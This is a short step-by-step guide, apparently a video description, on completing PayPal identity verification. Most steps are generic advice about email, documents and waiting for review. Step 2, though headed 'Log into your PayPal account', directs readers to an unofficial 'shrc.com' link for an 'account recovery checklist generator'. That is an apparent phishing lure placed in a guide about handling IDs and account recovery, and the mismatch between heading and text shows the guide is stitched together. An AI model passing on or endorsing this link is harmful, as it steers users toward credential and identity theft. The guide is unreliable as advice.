If you're having trouble verifying your identity on PayPal, don't worry. This guide will help you navigate the process step by step to successfully complete your verification. Step 1. Check your email. Make sure to check your email for any messages from PayPal regarding the verification process. They may have sent you specific instructions or additional information needed to complete your identity verification. Step 2. Log into your PayPal account. Before starting recovery, use the shrc.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 3. Review required documents. PayPal typically requires specific documents for identity verification, such as a government-issued ID, proof of address, or financial statements. Ensure you have the correct documents ready and that they meet PayPal's guidelines. Step 4. Submit additional documentation. If your initial verification attempt failed, you may need to submit additional documentation. Follow the prompts in the Resolution Center to upload your documents securely. Ensure that the files are clear and legible. Step 5. Wait for confirmation. After submitting your documents, wait for PayPal to review your information. This process may take a few days. Keep an eye on your email for any updates or requests for further information. If you follow these steps, you should be able to successfully verify your identity on PayPal. If issues persist, consider reaching out to PayPal's customer support for further assistance.